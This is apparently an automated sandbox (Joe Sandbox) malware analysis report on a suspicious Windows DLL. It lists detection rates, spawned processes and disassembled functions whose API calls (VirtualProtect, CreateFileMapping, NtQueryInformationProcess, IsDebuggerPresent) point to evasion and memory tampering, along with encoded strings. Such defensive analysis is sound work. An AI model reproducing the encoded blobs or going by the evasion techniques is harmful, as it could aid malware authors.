                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 24%, ReversingLabs
                        • Detection: 42%, Virustotal, Browse
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:6
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:7
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Imagebase:0xca0000
                        File size:262'432 bytes
                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:3.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:42%
                          Total number of Nodes:69
                          Total number of Limit Nodes:3
                          execution_graph 59363 6ceea9ae 15 API calls std::exception::exception 59295 6cee876b 59296 6cee8774 59295->59296 59303 6cee8ac8 IsProcessorFeaturePresent 59296->59303 59298 6cee8780 59304 6cee959d 10 API calls 2 library calls 59298->59304 59300 6cee8785 59301 6cee8789 59300->59301 59305 6cee95cf 7 API calls 2 library calls 59300->59305 59303->59298 59304->59300 59305->59301 59364 6ceeb5ab 43 API calls 2 library calls 59365 6cee87a4 4 API calls 2 library calls 59366 6cef0f25 60 API calls 59367 6ceea8a3 42 API calls 3 library calls 59345 6cee93e0 6 API calls 4 library calls 59368 6ceefda0 39 API calls 59346 6cef2260 15 API calls 59347 6ceec87e GetLastError SetLastError 59370 6cef033f 15 API calls ___free_lconv_mon 59374 6ceebdbb 6 API calls 59375 6cee873b 21 API calls 2 library calls 59348 6cee85f7 15 API calls ___std_type_info_destroy_list 59349 6cef05f5 18 API calls __dosmaperr 59350 6ceebf70 16 API calls 59379 6ceef7b0 19 API calls 2 library calls 59351 6cef2af0 20 API calls __startOneArgErrorHandling 59352 6ceee14f 20 API calls ___free_lconv_mon 59353 6ceed44c 17 API calls 2 library calls 59381 6cee8707 14 API calls ___scrt_release_startup_lock 59355 6ceee645 FreeLibrary 59357 6cef18df 21 API calls 59382 6ceeed9e LeaveCriticalSection 59383 6cee969c 34 API calls _unexpected 59358 6ceecddb 43 API calls 2 library calls 59359 6ceee459 6 API calls __dosmaperr 59384 6ceee696 17 API calls 59385 6ceec792 7 API calls 59306 6ced8a50 59311 6ced8a6f 59306->59311 59307 6ced8d27 59318 6cee80c0 5 API calls CatchGuardHandler 59307->59318 59309 6ced8d37 59310 6ced8c6c NtQueryInformationProcess 59310->59311 59311->59307 59311->59310 59312 6ced8d41 GetModuleHandleW 59311->59312 59314 6ced8bce GetModuleHandleW 59311->59314 59319 6ced8040 5 API calls CatchGuardHandler 59312->59319 59317 6ced8040 5 API calls CatchGuardHandler 59314->59317 59315 6ced8bfa 59315->59311 59317->59315 59318->59309 59319->59315 59320 6ced1210 59333 6ced1239 CatchIt 59320->59333 59321 6ced6da3 GetCurrentProcess 59339 6cee8cc0 59321->59339 59324 6ced78fa 59341 6cee80c0 5 API calls CatchGuardHandler 59324->59341 59326 6ced7904 59327 6ced7141 MapViewOfFile 59327->59333 59328 6ced7f1c VirtualProtect 59342 6cee8e20 59328->59342 59330 6ced7fb0 VirtualProtect 59330->59333 59331 6ced6f58 CreateFileMappingA 59331->59333 59332 6ced75b8 VirtualProtect 59332->59333 59333->59321 59333->59324 59333->59327 59333->59328 59333->59331 59333->59332 59334 6ced7644 VirtualProtect 59333->59334 59335 6ced7e7a CreateFileMappingA 59333->59335 59336 6ced78a8 FindCloseChangeNotification CloseHandle CloseHandle 59333->59336 59337 6ced6e2c K32GetModuleInformation GetModuleFileNameA CreateFileA 59333->59337 59338 6ced7112 CloseHandle 59333->59338 59334->59333 59335->59333 59336->59333 59337->59333 59338->59333 59340 6ced6dcf GetModuleHandleA 59339->59340 59340->59333 59341->59326 59343 6cee8e38 59342->59343 59343->59330 59343->59343 59361 6cee8553 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 59386 6ced1010 5 API calls CatchGuardHandler

                          Executed Functions

                          Function 6CED1210 Relevance: 57.4, APIs: 16, Strings: 13, Instructions: 6664memoryfileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: File$CloseHandleProtectVirtual$CreateModule$Mapping$ChangeCurrentFindInformationNameNotificationProcessView
                          • String ID: _W$_W$3q[a$3q[a$9[|$@$OaO$Yi[*$_bX$e6M1oDhFNEUDQyQ1oJj1NEuL5zRURE3b5VFs0+f0hafxBDQ3y+b0VERA8GHoBacixDQzS/8kxTRFr6+0NDuL5zRUREWlaBRES2LxHCRMDiK4cIgTSUgcBjQsBLQzSvgylw$fh{Z$iu\$}1DV
                          • API String ID: 1661531306-3674926077
                          • Opcode ID: 5617da81b6303a821e6d2af6591ce192f5f569c0967163ca0ac3f8b131601135
                          • Instruction ID: 34d6aaa19095938e17cd2afdecce8d6baf330a9373ee8f10906bed12368e642c
                          • Opcode Fuzzy Hash: 5617da81b6303a821e6d2af6591ce192f5f569c0967163ca0ac3f8b131601135
                          • Instruction Fuzzy Hash: 51C34432A51211CFEB14CE7DD9857E9B7F2AB93354F229247D418DB691C236AE4B8F00
                          Function 6CED8A50 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 209COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1117 6ced8a50-6ced8a68 1118 6ced8a6f-6ced8a7a 1117->1118 1119 6ced8b5b-6ced8bc9 1118->1119 1120 6ced8a80-6ced8a8d 1118->1120 1122 6ced8d77 1119->1122 1123 6ced8cf6-6ced8d04 1120->1123 1124 6ced8a93-6ced8aa0 1120->1124 1122->1118 1123->1122 1126 6ced8cbb-6ced8ccb 1124->1126 1127 6ced8aa6-6ced8ab3 1124->1127 1126->1122 1129 6ced8ab9-6ced8ac6 1127->1129 1130 6ced8d15-6ced8d22 1127->1130 1132 6ced8acc-6ced8ad9 1129->1132 1133 6ced8d27-6ced8d40 call 6cee80c0 1129->1133 1130->1122 1137 6ced8c4f-6ced8cb6 call 6cee8cc0 NtQueryInformationProcess 1132->1137 1138 6ced8adf-6ced8aec 1132->1138 1137->1122 1142 6ced8d09-6ced8d10 1138->1142 1143 6ced8af2-6ced8aff 1138->1143 1142->1122 1145 6ced8b05-6ced8b12 1143->1145 1146 6ced8cd0-6ced8cdf 1143->1146 1148 6ced8b18-6ced8b25 1145->1148 1149 6ced8d41-6ced8d70 GetModuleHandleW call 6ced8040 1145->1149 1146->1122 1152 6ced8bce-6ced8c3e GetModuleHandleW call 6ced8040 1148->1152 1153 6ced8b2b-6ced8b38 1148->1153 1149->1122 1152->1122 1157 6ced8b3e-6ced8b4b 1153->1157 1158 6ced8ce4-6ced8cf1 1153->1158 1161 6ced8b51-6ced8b56 1157->1161 1162 6ced8c43-6ced8c4a 1157->1162 1158->1122 1161->1122 1162->1122
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID: NtQueryInformationProcess$ntdll.dll
                          • API String ID: 4139908857-2906145389
                          • Opcode ID: 42bea393775d4a139636dbdeb81d9fbbb82b8e8d5f14bd32d2108b3ff9d5d4e3
                          • Instruction ID: 5b4ac924592b2e1bb15b89d691dd7f5c043ac48231e594be1dd39593c9e1b2b1
                          • Opcode Fuzzy Hash: 42bea393775d4a139636dbdeb81d9fbbb82b8e8d5f14bd32d2108b3ff9d5d4e3
                          • Instruction Fuzzy Hash: 9E818DB0E05208DFCB24CFACD58468DBBF4AB46344F21951BD465DBB90D735A907CB82

                          Non-executed Functions

                          Function 6CEE890A Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CEE8916
                          • IsDebuggerPresent.KERNEL32 ref: 6CEE89E2
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CEE89FB
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6CEE8A05
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: b45aed5a60500d20a20dc3da338e6e27f292a7f241964f8b343f6d336c2c5a3d
                          • Instruction ID: 1c56f765c19251c0ea72844c7860983c0ff227aa7eee54bad23ca54ad7bc4da4
                          • Opcode Fuzzy Hash: b45aed5a60500d20a20dc3da338e6e27f292a7f241964f8b343f6d336c2c5a3d
                          • Instruction Fuzzy Hash: 603108B5D053289BDF60DFA4D949BCDBBB8AF08344F1041AAE50DAB340EB719A84CF45
                          Function 6CEE8431 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6CEE8551,6CEF4934), ref: 6CEE8436
                          • UnhandledExceptionFilter.KERNEL32(6CEE8551,?,6CEE8551,6CEF4934), ref: 6CEE843F
                          • GetCurrentProcess.KERNEL32(C0000409,?,6CEE8551,6CEF4934), ref: 6CEE844A
                          • TerminateProcess.KERNEL32(00000000,?,6CEE8551,6CEF4934), ref: 6CEE8451
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                          • String ID:
                          • API String ID: 3231755760-0
                          • Opcode ID: 76d1766564898a21defabe37a1cb2db796e2db7da92a472e9a1dace08e5ed9dd
                          • Instruction ID: 478586dcff30e5577071ffc13f7abaacc284fe56a5c4a66d91923dee65dde554
                          • Opcode Fuzzy Hash: 76d1766564898a21defabe37a1cb2db796e2db7da92a472e9a1dace08e5ed9dd
                          • Instruction Fuzzy Hash: 46D01233204208FBCF002BE0EA0CE883F38EB8A202F014002F73E82001CB3144948B63
                          Function 6CEE7950 Relevance: 3.0, Strings: 2, Instructions: 530COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID:
                          • String ID: C-q)$sh&y
                          • API String ID: 0-3906045208
                          • Opcode ID: 013eefe44bebb0a5424c97deea289b88795355c18a4ab0885ed1de18a8f5dc3e
                          • Instruction ID: fa1f024cef2ea9cc8ae0d5d590f5d52c6b78efb49b78f949f09d5ff3725e6274
                          • Opcode Fuzzy Hash: 013eefe44bebb0a5424c97deea289b88795355c18a4ab0885ed1de18a8f5dc3e
                          • Instruction Fuzzy Hash: 0502DF31E446048FDF08CEBCD1953CE7BF2AB4B394F208416E424EBB65D62A890ACF55
                          Function 6CED8040 Relevance: 2.0, Strings: 1, Instructions: 742COMMON
                          Download Yara Rule
                          Strings
                          • Ef8eV6zq2gWqHRcokIdCtRoHI/4NsgRuCDUhRN2UEz5hf+4ycOedQ6Ns8wTSWo2sft86pZLD525JVJryaRYVQwQ0f7iYFTMZFsRVlGyjyC1jsYBQkxouYhl9pUvM+9xUsylT1L7tyx6YJjLdiOulC97ImkujaDspbtGbCTJnjuCf77sfWFugbx95q5qGzqnpp/4lXbdeHEr6bw+Iv536CK4OgF6IoN1NDKv/6IgF9iiUJBTU2JEFd7dMiAKwwe4D3G00, xrefs: 6CED825A, 6CED88F3, 6CED8966
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID:
                          • String ID: Ef8eV6zq2gWqHRcokIdCtRoHI/4NsgRuCDUhRN2UEz5hf+4ycOedQ6Ns8wTSWo2sft86pZLD525JVJryaRYVQwQ0f7iYFTMZFsRVlGyjyC1jsYBQkxouYhl9pUvM+9xUsylT1L7tyx6YJjLdiOulC97ImkujaDspbtGbCTJnjuCf77sfWFugbx95q5qGzqnpp/4lXbdeHEr6bw+Iv536CK4OgF6IoN1NDKv/6IgF9iiUJBTU2JEFd7dMiAKwwe4D3G00
                          • API String ID: 0-3414373431
                          • Opcode ID: e169539c3983451b8552cc5ca8a0ee227ed358af86a2d385f9ea446860d262ce
                          • Instruction ID: a06274ec96164aaa7b1ad594ca9d6f5ed8e6d280a2bf950752ca5cdd1f345a6f
                          • Opcode Fuzzy Hash: e169539c3983451b8552cc5ca8a0ee227ed358af86a2d385f9ea446860d262ce
                          • Instruction Fuzzy Hash: F0528976A012048FCB64CFACC8907DDBBF2EB4A354F22611AE425EB755C635A807CF45
                          Function 6CEF34F5 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CEF34F0,?,?,00000008,?,?,6CEF30F3,00000000), ref: 6CEF3722
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 07a5b6f02111ecdd5db957f23041c13a310bfff49040cb04653e013f3333639b
                          • Instruction ID: 505ef0990078b98103eb6bb21bbe0da5c4d5d701de4cf8eb7447dc000a412196
                          • Opcode Fuzzy Hash: 07a5b6f02111ecdd5db957f23041c13a310bfff49040cb04653e013f3333639b
                          • Instruction Fuzzy Hash: BAB126712116089FD705CF28C486B697BB0FF45368F358698E8A9CF7A1C335E992CB41
                          Function 6CEE8AC8 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CEE8ADE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: 78934c33e63def694bec5ec50f00ef65b68ad9c6392bf43ddfdeae2c84f187d1
                          • Instruction ID: cfd8d9ee9819f560c4b4859e2b8b0866671448917aee81b21336b4097f1d90f0
                          • Opcode Fuzzy Hash: 78934c33e63def694bec5ec50f00ef65b68ad9c6392bf43ddfdeae2c84f187d1
                          • Instruction Fuzzy Hash: 89519EB9F122098FEB64CF98C48279EBBF0FB49359F24856AD515EB740D375AA00CB50
                          Function 6CEECF58 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a37a760330a1e55ac33ad7d3a6640ce9f5aaad6c5be877317adf74798fc14a7b
                          • Instruction ID: 8bbda8d25a4aefd6bf3ad251ec37aa0edaa96c5753580bbcee431cb5d2b2a510
                          • Opcode Fuzzy Hash: a37a760330a1e55ac33ad7d3a6640ce9f5aaad6c5be877317adf74798fc14a7b
                          • Instruction Fuzzy Hash: AD41A375905218AECB10DF69CC88AEABBB9AB49348F2442DDE41DD3300DB359E45CF50
                          Function 6CED1010 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID:
                          • String ID: 7At<
                          • API String ID: 0-1507604614
                          • Opcode ID: 877457a4a92b6edcef25588ba2a5dd4a64a9aed37e39daae6a604cef7fb98ba7
                          • Instruction ID: de2cf6c1cb06292b26698269ed2d58456c50f758dbf8917fd7f3388b49409ca7
                          • Opcode Fuzzy Hash: 877457a4a92b6edcef25588ba2a5dd4a64a9aed37e39daae6a604cef7fb98ba7
                          • Instruction Fuzzy Hash: B151C076B442498FDB04CEFCC8917DEBBF1AF4B324F21811AD415E7B51C236A9069B64
                          Function 6CEEA33A Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 6CEEA459
                          • ___TypeMatch.LIBVCRUNTIME ref: 6CEEA567
                          • CatchIt.LIBVCRUNTIME ref: 6CEEA5B8
                          • _UnwindNestedFrames.LIBCMT ref: 6CEEA6B9
                          • CallUnexpected.LIBVCRUNTIME ref: 6CEEA6D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 4119006552-393685449
                          • Opcode ID: 4927550de08f43e678f1bc72960fd00bd2d17d3c3e9c4021587a75f09950c64e
                          • Instruction ID: c83276840669e352bcceb0caf86627718b701d89833a7059d8ac6cee6dbbf479
                          • Opcode Fuzzy Hash: 4927550de08f43e678f1bc72960fd00bd2d17d3c3e9c4021587a75f09950c64e
                          • Instruction Fuzzy Hash: 07B1667188120AEFCF05CFA4C88099EBBB5BF09398B34426EE8116BB15D731DA55CF91
                          Function 6CEE93E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CEE9417
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CEE941F
                          • _ValidateLocalCookies.LIBCMT ref: 6CEE94A8
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CEE94D3
                          • _ValidateLocalCookies.LIBCMT ref: 6CEE9528
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: a9f7b27c8c967d16d627cae6cb27dad7481ead462856a6667fc4adcbf77cb18f
                          • Instruction ID: 0a1f5b54aa3aab11c7dadabf0cf689acd2b224d9a4c2493a02c634c07c5132d4
                          • Opcode Fuzzy Hash: a9f7b27c8c967d16d627cae6cb27dad7481ead462856a6667fc4adcbf77cb18f
                          • Instruction Fuzzy Hash: A241B674A002499FCF00CF68C8C4ADE7BF5AF4A36CF348559E8249B751D7359A05CB91
                          Function 6CEEE2AA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6CEEE3B9,00000000,6CEEBBC0,00000000,00000000,00000001,?,6CEEE532,00000022,FlsSetValue,6CEF5CD8,6CEF5CE0,00000000), ref: 6CEEE36B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmpDownload File
